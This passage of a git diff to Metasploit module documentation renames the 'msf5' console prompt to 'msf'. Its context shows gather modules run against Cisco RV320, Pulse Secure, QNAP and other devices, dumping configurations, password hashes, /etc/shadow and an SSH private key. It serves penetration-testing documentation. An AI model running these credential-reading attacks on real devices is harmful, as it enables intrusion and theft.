b/documentation/modules/auxiliary/gather/cisco_rv320_config.md index d1383e70b9..6506dff8b9 100644 --- a/documentation/modules/auxiliary/gather/cisco_rv320_config.md +++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md 
@@ -30,11 +30,11 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019 #### Against firmware version 1.4.2.15, on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) @@ -44,15 +44,15 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against firmware version 1.4.2.15, on the WAN interface, port 8007: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54 RHOSTS => 203.0.113.54 -msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007 +msf auxiliary(gather/cisco_rv320_config) > set RPORT 8007 RPORT => 8007 -msf5 auxiliary(gather/cisco_rv320_config) > set SSL false +msf auxiliary(gather/cisco_rv320_config) > set SSL false SSL => false -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) 
@@ -62,11 +62,11 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against firmware version 1.4.2.17, on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt [*] Scanned 1 of 1 hosts (100% complete) @@ -76,11 +76,11 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443: ``` -msf5 > -msf5 > use auxiliary/gather/cisco_rv320_config -msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 +msf > +msf > use auxiliary/gather/cisco_rv320_config +msf auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 -msf5 auxiliary(gather/cisco_rv320_config) > run +msf auxiliary(gather/cisco_rv320_config) > run [-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched [*] Auxiliary module execution completed @@ -89,7 +89,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run #### If module succeeds, check the database: ``` -msf5 auxiliary(gather/cisco_rv320_config) > hosts +msf auxiliary(gather/cisco_rv320_config) > hosts Hosts ===== @@ -101,7 +101,7 @@ address mac name os_name os_flavor os_sp purpose ``` ``` -msf5 auxiliary(gather/cisco_rv320_config) > creds +msf auxiliary(gather/cisco_rv320_config) > creds Credentials =========== @@ -112,7 +112,7 @@ host origin service public private ``` ``` -msf5 auxiliary(gather/cisco_rv320_config) > loot +msf auxiliary(gather/cisco_rv320_config) > loot Loot ==== 
diff --git a/documentation/modules/auxiliary/gather/cloud_lookup.md b/documentation/modules/auxiliary/gather/cloud_lookup.md index 73f11b2404..992883a78d 100644 --- a/documentation/modules/auxiliary/gather/cloud_lookup.md +++ b/documentation/modules/auxiliary/gather/cloud_lookup.md @@ -34,9 +34,9 @@ You can use a custom string to perform the comparison. This is the hostname [fqdn] on which the website responds. But this can also be a domain. -msf5 auxiliary(gather/cloud_lookup) > set hostname www.zataz.com +msf auxiliary(gather/cloud_lookup) > set hostname www.zataz.com --or-- -msf5 auxiliary(gather/cloud_lookup) > set hostname discordapp.com +msf auxiliary(gather/cloud_lookup) > set hostname discordapp.com ### IPBLACKLIST_FILE @@ -85,9 +85,9 @@ HTTP(s) request timeout. Default: 8 If successful, you must be able to obtain the IP(s) address of the website as follows: ``` -msf5 auxiliary(gather/cloud_lookup) > set verbose true +msf auxiliary(gather/cloud_lookup) > set verbose true verbose => true -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Selected action: Amazon CloudFlare [*] Passive gathering information... @@ -124,9 +124,9 @@ parameter of the HTTP header. For example: ``` -msf5 auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr +msf auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr hostname => www.exodata.fr -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Selected action: Amazon CloudFlare [*] Passive gathering information... 
@@ -152,11 +152,11 @@ msf5 auxiliary(gather/cloud_lookup) > run *or* ``` -msf5 auxiliary(gather/cloud_lookup) > set verbose false +msf auxiliary(gather/cloud_lookup) > set verbose false verbose => false -msf5 auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com +msf auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com hostname => www.ingensecurity.com -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run [*] Passive gathering information... [*] * ViewDNS.info: 2 IP address found(s). 
@@ -182,30 +182,30 @@ a page other than the index page. For example: ``` -msf5 > use auxiliary/gather/cloud_lookup -msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com +msf > use auxiliary/gather/cloud_lookup +msf auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com hostname => www.zataz.com -msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ +msf auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ uripath => /contacter/ -msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ +msf auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ compstr => Contacter ZATAZ -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run ... ``` *or* ``` -msf5 > use auxiliary/gather/cloud_lookup -msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com +msf > use auxiliary/gather/cloud_lookup +msf auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com hostname => www.zataz.com -msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ +msf auxiliary(gather/cloud_lookup) > set URIPATH /contacter/ uripath => /contacter/ -msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ +msf auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ compstr => Contacter ZATAZ -msf5 auxiliary(gather/cloud_lookup) > set tag html +msf auxiliary(gather/cloud_lookup) > set tag html tag => html -msf5 auxiliary(gather/cloud_lookup) > run +msf auxiliary(gather/cloud_lookup) > run ... ``` diff --git a/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md b/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md index e1358573bd..af18ccbfec 100644 --- a/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md +++ b/documentation/modules/auxiliary/gather/dolibarr_list_creds_sqli.md 
@@ -26,16 +26,16 @@ ``` - msf5 > use auxiliary/gather/dolibarr_list_creds_sqli - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set username test + msf > use auxiliary/gather/dolibarr_list_creds_sqli + msf auxiliary(gather/dolibarr_list_creds_sqli) > set username test username => test - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set password blah + msf auxiliary(gather/dolibarr_list_creds_sqli) > set password blah password => blah - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set targeturi /dolibarr + msf auxiliary(gather/dolibarr_list_creds_sqli) > set targeturi /dolibarr targeturi => /dolibarr - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > set rhosts 192.168.37.228 + msf auxiliary(gather/dolibarr_list_creds_sqli) > set rhosts 192.168.37.228 rhosts => 192.168.37.228 - msf5 auxiliary(gather/dolibarr_list_creds_sqli) > run + msf auxiliary(gather/dolibarr_list_creds_sqli) > run [*] Logging in... [+] Successfully logged into Dolibarr diff --git a/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md b/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md index 7afaf2dc87..f2b210231e 100644 --- a/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md +++ b/documentation/modules/auxiliary/gather/f5_bigip_cookie_disclosure.md 
@@ -21,25 +21,25 @@ and backend servers' IP addresses and ports) through cookies inserted by the BIG ### F5 BIP-IP load balancing cookie not found ``` -msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS www.example.com +msf > use auxiliary/gather/f5_bigip_cookie_disclosure +msf auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS www.example.com RHOSTS => www.example.com -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run +msf auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 93.184.216.34 [*] Starting request / [-] F5 BIG-IP load balancing cookie not found [*] Auxiliary module execution completed -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > +msf auxiliary(gather/f5_bigip_cookie_disclosure) > ``` ### F5 BIP-IP load balancing cookie found ``` -msf5 > use auxiliary/gather/f5_bigip_cookie_disclosure -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS vulnerable-target.com +msf > use auxiliary/gather/f5_bigip_cookie_disclosure +msf auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOSTS vulnerable-target.com RHOSTS => vulnerable-target.com -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run +msf auxiliary(gather/f5_bigip_cookie_disclosure) > run [*] Running module against 1.1.1.1 [*] Starting request / @@ -47,7 +47,7 @@ msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > run [+] Load balancing pool name "~DMZ~EXAMPLE~vulnarable-target-443_pool" found [+] Backend 10.1.105.72:443 found [*] Auxiliary module execution completed -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > notes +msf auxiliary(gather/f5_bigip_cookie_disclosure) > notes Notes ===== 
@@ -57,5 +57,5 @@ Notes 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_cookie_name "BIGipServer~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_pool_name "~DMZ~EXAMPLE~vulnarable-target-443_pool" 2019-08-20 21:21:02 UTC 1.1.1.1 f5_load_balancer_backends [{:host=>"10.1.105.72", :port=>443}] -msf5 auxiliary(gather/f5_bigip_cookie_disclosure) > +msf auxiliary(gather/f5_bigip_cookie_disclosure) > ``` diff --git a/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md b/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md index fa8503b249..02cd8daee8 100644 --- a/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md +++ b/documentation/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.md @@ -40,10 +40,10 @@ Default false. Show full URL for the packages instead of the filename. ### Relay Version 9.5.10.79 ``` -msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts +msf > use auxiliary/gather/ibm_bigfix_sites_packages_enum +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts rhosts => -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit [*] Running module against [IP] [+] [Organization] @@ -62,5 +62,5 @@ msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit [+] File: [package name] [*] Auxiliary module execution completed -msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > +msf auxiliary(gather/ibm_bigfix_sites_packages_enum) > ``` diff --git a/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md b/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md index dad04fc824..318f4ed3b2 100644 --- a/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md +++ b/documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md 
@@ -51,10 +51,10 @@ if ($Q::query == "ADMINID") { ### Against the Mock page listed above ``` - msf5 > use auxiliary/gather/ipcamera_password_disclosure - msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1 + msf > use auxiliary/gather/ipcamera_password_disclosure + msf auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 - msf5 auxiliary(gather/ipcamera_password_disclosure) > run + msf auxiliary(gather/ipcamera_password_disclosure) > run [+] Found: admin:password [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/gather/ldap_passwords.md b/documentation/modules/auxiliary/gather/ldap_passwords.md index cd74df1ef8..92440a131b 100644 --- a/documentation/modules/auxiliary/gather/ldap_passwords.md +++ b/documentation/modules/auxiliary/gather/ldap_passwords.md @@ -125,7 +125,7 @@ msf auxiliary(gather/ldap_passwords) > run msf auxiliary(gather/ldap_passwords) > set RHOSTS 192.0.2.1 RHOSTS => 192.0.2.1 -msf5 auxiliary(gather/ldap_passwords) > run +msf auxiliary(gather/ldap_passwords) > run [*] Running module against 192.0.2.1 [*] Discovered base DN: dc=server,dc=nas diff --git a/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md b/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md index 22e8acea09..28197ac747 100644 --- a/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md +++ b/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md 
@@ -42,10 +42,10 @@ Add a user ### Mikrotik Cloud Router RouterOS 6.40.4 ``` -msf5 > use auxiliary/gather/mikrotik_winbox_fileread -msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1 +msf > use auxiliary/gather/mikrotik_winbox_fileread +msf auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(gather/mikrotik_winbox_fileread) > run +msf auxiliary(gather/mikrotik_winbox_fileread) > run [*] Running for 1.1.1.1... [*] 1.1.1.1 - Session ID: 54 diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md b/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md index d52b423f14..ef56e3fbcb 100644 --- a/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md +++ b/documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md @@ -60,14 +60,14 @@ It is worth noticing that when a user logs in, the session has to be maintained ### Tested on Windows 10 Pro x64 running NCS Server v2.1.0 ``` -msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200 +msf auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit +msf auxiliary(gather/nuuo_cms_bruteforce) > exploit [*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee! [*] 172.22.222.200:5180 - Generating 2621440 session tokens [+] 172.22.222.200:5180 - Found valid user session: 42094216 [*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893 [*] Auxiliary module execution completed -msf5 auxiliary(gather/nuuo_cms_bruteforce) > +msf auxiliary(gather/nuuo_cms_bruteforce) > ``` diff --git a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md index 9e3eaf8394..3759ac04bb 100644 --- a/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md 
+++ b/documentation/modules/auxiliary/gather/nuuo_cms_file_download.md @@ -46,9 +46,9 @@ The following versions were tested: ### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 +msf auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 auxiliary(gather/nuuo_cms_file_download) > exploit +msf auxiliary(gather/nuuo_cms_file_download) > exploit [+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg [+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg @@ -59,5 +59,5 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit [*] 172.22.222.200:5180 - password NUCMS2007! to unzip them. [*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed! [*] Auxiliary module execution completed -msf5 auxiliary(gather/nuuo_cms_file_download) > +msf auxiliary(gather/nuuo_cms_file_download) > ``` diff --git a/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md b/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md index b3079c093d..c6a269c61b 100644 --- a/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md +++ b/documentation/modules/auxiliary/gather/oats_downloadservlet_traversal.md @@ -54,7 +54,7 @@ Special thanks to Steven Seeley to assist on the development of the Metasploit m ## Scenarios ``` -msf5 auxiliary(gather/oats_downloadservlet_traversal) > run +msf auxiliary(gather/oats_downloadservlet_traversal) > run [*] Running module against 172.16.249.143 @@ -75,5 +75,5 @@ msf5 auxiliary(gather/oats_downloadservlet_traversal) > run [*] Auxiliary module execution completed -msf5 auxiliary(gather/oats_downloadservlet_traversal) > +msf auxiliary(gather/oats_downloadservlet_traversal) > ``` 
diff --git a/documentation/modules/auxiliary/gather/office365userenum.md b/documentation/modules/auxiliary/gather/office365userenum.md index 93444ed141..461923dd85 100644 --- a/documentation/modules/auxiliary/gather/office365userenum.md +++ b/documentation/modules/auxiliary/gather/office365userenum.md @@ -46,9 +46,9 @@ The following demonstrates basic usage, using the supplied users wordlist and default options. ``` -msf5 auxiliary(gather/office365userenum) > set users /home/msfdev/users +msf auxiliary(gather/office365userenum) > set users /home/msfdev/users users => /home/msfdev/users -msf5 auxiliary(gather/office365userenum) > run +msf auxiliary(gather/office365userenum) > run [*] diff --git a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md index deb810183f..6fc36bf6e5 100644 --- a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md +++ b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md @@ -50,8 +50,8 @@ Refer to its installation guide, use a free Solo license. BypassLogin: ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true -msf5 auxiliary(gather/peplink_bauth_sqli) > run +msf auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true +msf auxiliary(gather/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems to be vulnerable @@ -84,7 +84,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [*] Retrieving mvpn_summary [+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt [*] Auxiliary module execution completed -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config: 
@@ -122,11 +122,11 @@ LEFTTIME_USAGE="yes" EnumPrivs and EnumUsernames: ``` -msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true +msf auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true EnumPrivs => true -msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true +msf auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true EnumUsernames => true -msf5 auxiliary(sqli/peplink_bauth_sqli) > run +msf auxiliary(sqli/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems vulnerable @@ -140,7 +140,7 @@ msf5 auxiliary(sqli/peplink_bauth_sqli) > run ... [*] Auxiliary module execution completed -msf5 auxiliary(sqli/peplink_bauth_sqli) > +msf auxiliary(sqli/peplink_bauth_sqli) > ``` Verbose: @@ -148,9 +148,9 @@ Verbose: When you enable verbose, you get the parsed XML document displayed. ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true -msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true -msf5 auxiliary(gather/peplink_bauth_sqli) > run +msf auxiliary(gather/peplink_bauth_sqli) > set Verbose true +msf auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true +msf auxiliary(gather/peplink_bauth_sqli) > run [*] Running module against 192.168.1.254 [+] Target seems to be vulnerable @@ -397,13 +397,13 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [+] WAN Port Unavailable [+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt [*] Auxiliary module execution completed -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` Loot: ``` -msf5 auxiliary(gather/peplink_bauth_sqli) > loot +msf auxiliary(gather/peplink_bauth_sqli) > loot Loot ==== 
@@ -425,6 +425,6 @@ host service type name content 192.168.1.254 peplink cert_info text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt 192.168.1.254 peplink mvpn_summary text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt -msf5 auxiliary(gather/peplink_bauth_sqli) > +msf auxiliary(gather/peplink_bauth_sqli) > ``` diff --git a/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md index d2e9d1b47d..353f243d5e 100644 --- a/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md +++ b/documentation/modules/auxiliary/gather/pimcore_creds_sqli.md @@ -48,12 +48,12 @@ wvu@kharak:~$ ### Tested on Ubuntu 18.04.1 Running Pimcore v5.2.3 ``` -msf5 > use auxiliary/gather/pimcore_creds_sqli -msf5 auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246 +msf > use auxiliary/gather/pimcore_creds_sqli +msf auxiliary(gather/pimcore_creds_sqli) > set rhosts 192.168.37.246 rhosts => 192.168.37.246 -msf5 auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b +msf auxiliary(gather/pimcore_creds_sqli) > set apikey 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b apikey => 77369eee2b728e0efbb2c296549aea09b91d3751c26a3c27ce0b1dbb6bfaf11b -msf5 auxiliary(gather/pimcore_creds_sqli) > run +msf auxiliary(gather/pimcore_creds_sqli) > run [+] Credentials obtained: [+] admin : $2y$10$sBaD3EOAm/i1F3Mm/fwseeq3nyoacdlUt4NkVLZUgJ4FTReJSKIbe diff --git a/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md b/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md index d9dd8abb7e..2fa68021a0 100644 --- a/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md +++ b/documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md 
@@ -40,7 +40,7 @@ Whether to print file contents to the screen. Valid only in manual mode. Dumping creds and sessions in automatic mode: ``` -msf5 auxiliary(gather/pulse_secure_file_disclosure) > run +msf auxiliary(gather/pulse_secure_file_disclosure) > run [*] Running module against [redacted] [*] Running in automatic mode @@ -61,7 +61,7 @@ msf5 auxiliary(gather/pulse_secure_file_disclosure) > run [*] Dumping /data/runtime/mtmp/system [+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin [*] Auxiliary module execution completed -msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot +msf auxiliary(gather/pulse_secure_file_disclosure) > loot Loot ==== @@ -72,15 +72,15 @@ host service type name [redacted] Pulse Secure VPN Arbitrary File Disclosure /data/runtime/mtmp/lmdb/randomVal/data.mdb application/octet-stream Session IDs /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb [redacted] Pulse Secure VPN Arbitrary File Disclosure /data/runtime/mtmp/system application/octet-stream Hashed credentials /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin -msf5 auxiliary(gather/pulse_secure_file_disclosure) > +msf auxiliary(gather/pulse_secure_file_disclosure) > ``` Dumping default `/etc/passwd` in manual mode: ``` -msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual +msf auxiliary(gather/pulse_secure_file_disclosure) > set action Manual action => Manual -msf5 auxiliary(gather/pulse_secure_file_disclosure) > run +msf auxiliary(gather/pulse_secure_file_disclosure) > run [*] Running module against [redacted] [*] Running in manual mode @@ -97,5 +97,5 @@ postgres:x:102:102:PostgreSQL User:/: [+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin [*] Auxiliary module execution completed -msf5 auxiliary(gather/pulse_secure_file_disclosure) > +msf auxiliary(gather/pulse_secure_file_disclosure) > ``` 
diff --git a/documentation/modules/auxiliary/gather/qnap_lfi.md b/documentation/modules/auxiliary/gather/qnap_lfi.md index b417796561..97eaf007a4 100644 --- a/documentation/modules/auxiliary/gather/qnap_lfi.md +++ b/documentation/modules/auxiliary/gather/qnap_lfi.md @@ -46,7 +46,7 @@ Whether to print file contents to the screen, defaults to true. #### Dumping hashes from `/etc/shadow` ``` -msf5 auxiliary(gather/qnap_lfi) > run +msf auxiliary(gather/qnap_lfi) > run [*] Running module against [REDACTED] [*] Getting the Album Id @@ -68,7 +68,7 @@ Merle:$1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0:17438:0:99999:7::: a9d01ba7:$1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/:18405:0:99999:7::: [*] adding the /etc/shadow entries to the database [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > loot +msf auxiliary(gather/qnap_lfi) > loot Loot ==== @@ -77,7 +77,7 @@ host service type name content info path ---- ------- ---- ---- ------- ---- ---- [REDACTED] qnap.http shadow text/plain /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin -msf5 auxiliary(gather/qnap_lfi) > creds +msf auxiliary(gather/qnap_lfi) > creds Credentials =========== @@ -91,7 +91,7 @@ host origin service public private re [REDACTED] Merle $1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0 Nonreplayable hash md5crypt [REDACTED] a9d01ba7 $1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/ Nonreplayable hash md5crypt -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` The hashes can be used to login from the web interface, or through ssh if it's enabled. 
@@ -99,9 +99,9 @@ The hashes can be used to login from the web interface, or through ssh if it's e #### Dumping ssh private keys ``` -msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /root/.ssh/id_rsa +msf auxiliary(gather/qnap_lfi) > set FILEPATH /root/.ssh/id_rsa FILEPATH => /root/.ssh/id_rsa -msf5 auxiliary(gather/qnap_lfi) > exploit +msf auxiliary(gather/qnap_lfi) > exploit [*] Running module against [redacted] [*] Getting the Album Id @@ -115,15 +115,15 @@ msf5 auxiliary(gather/qnap_lfi) > exploit [redacted] -----END RSA PRIVATE KEY----- [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` #### Retrieving the token, can be used to authenticate ``` -msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /share/Multimedia/.@__thumb/ps.app.token +msf auxiliary(gather/qnap_lfi) > set FILEPATH /share/Multimedia/.@__thumb/ps.app.token FILEPATH => /share/Multimedia/.@__thumb/ps.app.token -msf5 auxiliary(gather/qnap_lfi) > exploit +msf auxiliary(gather/qnap_lfi) > exploit [*] Running module against [redacted] [*] Getting the Album Id @@ -135,7 +135,7 @@ msf5 auxiliary(gather/qnap_lfi) > exploit [+] File content: [redacted] [*] Auxiliary module execution completed -msf5 auxiliary(gather/qnap_lfi) > +msf auxiliary(gather/qnap_lfi) > ``` The token can then be used to authenticate, by sending a POST request to the uri `/cgi-bin/authLogin.cgi`, for the example above: @@ -147,7 +147,7 @@ This would return an `authSid`, that can be used with most endpoints that requir ### QNAP QTS 4.3.6 with Photo Station 5.7.9 ``` -msf5 auxiliary(gather/qnap_lfi) > show options +msf auxiliary(gather/qnap_lfi) > show options Module options (auxiliary/gather/qnap_lfi): @@ -171,7 +171,7 @@ Auxiliary action: Download Download the file at FILEPATH -msf5 auxiliary(gather/qnap_lfi) > run +msf auxiliary(gather/qnap_lfi) > run [*] Running module against 192.168.250.5 [*] Getting the Album Id 
